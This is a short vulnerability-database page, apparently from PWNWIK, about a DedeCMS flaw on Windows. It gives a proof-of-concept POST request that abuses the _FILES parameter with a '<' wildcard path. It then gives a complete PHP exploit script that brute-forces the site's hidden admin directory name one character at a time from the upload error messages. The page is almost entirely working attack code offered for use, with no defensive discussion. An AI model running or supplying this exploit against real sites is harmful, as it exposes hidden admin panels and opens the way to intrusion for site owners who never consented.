PWNWIK.COM
,
전제 조건
Windows 시스템 만
POC
http://localhost/dedecms/tags.php post: dopost=save&_FILESb4dboytmp_name=./de</images/admin_top_logo.gif&_FILESb4dboyname=0&_FILESb4dboysize=0&_FILESb4dboytype=image/gif
EXP
<?php $domain='http://localhost/dedecms/'; $url=$domain.'/index.php'; function post($url, $data, $cookie = '') { $options = array( CURLOPT_RETURNTRANSFER => true, CURLOPT_HEADER => true, CURLOPT_POST => true, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_COOKIE => $cookie, CURLOPT_POSTFIELDS => $data, ); $ch = curl_init($url); curl_setopt_array($ch, $options); $result = curl_exec($ch); curl_close($ch); return $result; } $testlen=25; $str=range('a','z'); $number=range(0,9,1); $dic = array_merge($str, $number); $n=true; $nn=true; $path=''; while($n){ foreach($dic as $v){ foreach($dic as $vv){ #echo $v.$vv .'----'; $post_data="dopost=save&_FILESb4dboytmp_name=./$v$vv</images/admin_top_logo.gif&_FILESb4dboyname=0&_FILESb4dboysize=0&_FILESb4dboytype=image/gif"; $result=post($url,$post_data); if(strpos($result,'Upload filetype not allow !') === false){ $path=$v.$vv;$n=false;break 2; } } } } while($nn){ foreach($dic as $vvv){ $post_data="dopost=save&_FILESb4dboytmp_name=./$path$vvv</images/admin_top_logo.gif&_FILESb4dboyname=0&_FILESb4dboysize=0&_FILESb4dboytype=image/gif"; $result=post($url,$post_data); if(strpos($result,'Upload filetype not allow !') === false){ $path.=$vvv; echo $path . PHP_EOL; $giturl=$domain.'/'.$path.'/images/admin_top_logo.gif'; if(@file_get_contents($giturl)){ echo $domain.'/'.$path.'/'; $nn=false;break 2; } } } } ?>
免费、自由、人人可编辑的漏洞库